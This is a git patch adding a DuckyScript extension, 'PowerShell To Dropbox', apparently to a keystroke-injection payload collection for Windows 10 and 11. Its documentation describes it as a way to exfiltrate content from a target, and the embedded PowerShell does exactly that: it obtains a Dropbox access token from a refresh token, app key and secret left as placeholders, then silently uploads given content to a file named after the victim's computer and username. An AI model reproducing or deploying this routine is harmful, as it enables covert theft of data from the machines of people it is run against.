From f8a43715524cc6c32796c404e65e4d8e1871fae1 Mon Sep 17 00:00:00 2001
From: Julien M <157210867+PlumpyTurkey@users.noreply.github.com>
Date: Sun, 2 Jun 2024 13:21:39 +0200
Subject: [PATCH] Update "PowerShell To Dropbox" Extension

---
 .../community/POWERSHELL_TO_DROPBOX           | 43 +++++++++++++++++++
 1 file changed, 43 insertions(+)
 create mode 100644 payloads/extensions/community/POWERSHELL_TO_DROPBOX

diff --git a/payloads/extensions/community/POWERSHELL_TO_DROPBOX b/payloads/extensions/community/POWERSHELL_TO_DROPBOX
new file mode 100644
index 0000000..8fe6ef4
--- /dev/null
+++ b/payloads/extensions/community/POWERSHELL_TO_DROPBOX
@@ -0,0 +1,43 @@
+EXTENSION POWERSHELL_TO_DROPBOX
+    REM_BLOCK DOCUMENTATION
+        Title: PowerShell To Dropbox
+        Author: PlumpyTurkey
+        Description: This extension allows you to exfiltrate content available from PowerShell to a file in your Dropbox.
+        Target: Windows 10, 11
+        Version: 1.1
+    END_REM
+
+    REM Required options:
+    DEFINE #PTD_CONTENT $Content
+    DEFINE #PTD_REFRESH_TOKEN XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+    DEFINE #PTD_APP_KEY XXXXXXXXXXXXXXX
+    DEFINE #PTD_APP_SECRET XXXXXXXXXXXXXXX
+
+    REM Advanced options:
+    DEFINE #PTD_OUTPUT_FOLDER Exfiltrated-content
+    DEFINE #PTD_OUTPUT_FILE [${env:COMPUTERNAME}-${env:USERNAME}].txt
+
+    FUNCTION PTD_SEND()
+        STRING_POWERSHELL
+            try { 
+                Invoke-RestMethod -Uri "https://content.dropboxapi.com/2/files/upload" -Method Post -Headers @{ 
+                    "Authorization" = "Bearer $((
+                    Invoke-RestMethod -Uri "https://api.dropboxapi.com/oauth2/token" -Method Post -Headers @{ 
+                        "Content-Type" = "application/x-www-form-urlencoded" 
+                    } -Body @{ 
+                        "grant_type" = "refresh_token"; 
+                        "refresh_token" = #PTD_REFRESH_TOKEN; 
+                        "client_id" = #PTD_APP_KEY; 
+                        "client_secret" = #PTD_APP_SECRET 
+                    }
+                ).access_token)"; 
+                    "Content-Type" = "application/octet-stream"; 
+                    "Dropbox-API-Arg" = "{""path"":""/#PTD_OUTPUT_FOLDER/#PTD_OUTPUT_FILE"",""mode"":""add"",""autorename"":true,""mute"":false}" 
+                } -Body #PTD_CONTENT | Out-Null 
+            } 
+            catch { 
+                Write-Host "An error occurred: $_" 
+            }
+        END_STRING
+    END_FUNCTION
+END_EXTENSION